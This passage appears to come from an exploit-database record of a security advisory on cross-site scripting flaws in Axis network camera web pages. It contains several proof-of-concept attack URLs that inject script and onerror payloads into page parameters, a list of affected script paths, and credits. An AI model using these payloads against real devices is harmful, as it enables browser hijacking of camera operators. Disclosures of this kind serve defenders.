Vectors\r\nhttp://\r\n{axishost}/admin/config.shtml?group=%3Cscript%3Ealert%281%29%3C/script%3E\r\n\r\nhttp://{axishost}/view/custom_whiteBalance.shtml?imagePath=<img src=\"xs\"\r\nonerror=alert(7) /><!--\r\nhttp://{axishost}/admin-bin/editcgi.cgi?file=<script>alert(1)</script>\r\n\r\nhttp://\r\n{axishost}/operator/recipient_test.shtml?protocol=%3Cscript%3Ealert%281%29%3C/script%3E\r\n\r\nhttp://\r\n{axishost}/admin/showReport.shtml?content=alwaysmulti.sdp&pageTitle=axis</title></head><body><pre><script>alert(1)</script>\r\n\r\n# SCRIPTPATHS:\r\n\r\n{HTMLROOT}/showReport.shtml\r\n{HTMLROOT}/config.shtml\r\n{HTMLROOT}/incl/top_incl.shtml\r\n{HTMLROOT}/incl/popup_header.shtml\r\n{HTMLROOT}/incl/page_header.shtml\r\n{HTMLROOT}/incl/top_incl_popup.shtml\r\n{HTMLROOT}/viewAreas.shtml\r\n{HTMLROOT}/vmd.shtml\r\n{HTMLROOT}/custom_whiteBalance.shtml\r\n{HTMLROOT}/playWindow.shtml\r\n{HTMLROOT}/incl/ptz_incl.shtml\r\n{HTMLROOT}/view.shtml\r\n{HTMLROOT}/streampreview.shtml\r\n\r\n\r\nImpact\r\n------\r\nallows to run arbitrary code on a victim's browser and computer if combined\r\nwith another flaws in the same devices.\r\n\r\nAffected products\r\n-----------------\r\nMultiple Axis Network products.\r\n\r\nsolution\r\n--------\r\nIt was not provided any solution to the problem.\r\n\r\nCredits\r\n-------\r\nThe vulnerability has been discovered by SmithW from OrwellLabs\r\n\r\nLegal Notices\r\n-----------------\r\nThe information contained within this advisory is supplied \"as-is\" with no\r\nwarranties or guarantees of fitness of use or otherwise. I accept no\r\nresponsibility for any damage caused by the use or misuse of this\r\ninformation.\r\n\r\n\r\nAbout Orwelllabs\r\n++++++++++++++++\r\ndoublethinking...\n\n# 0day.today [2018-02-19] #", "sourceHref": "https://0day.today/exploit/27335", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}]}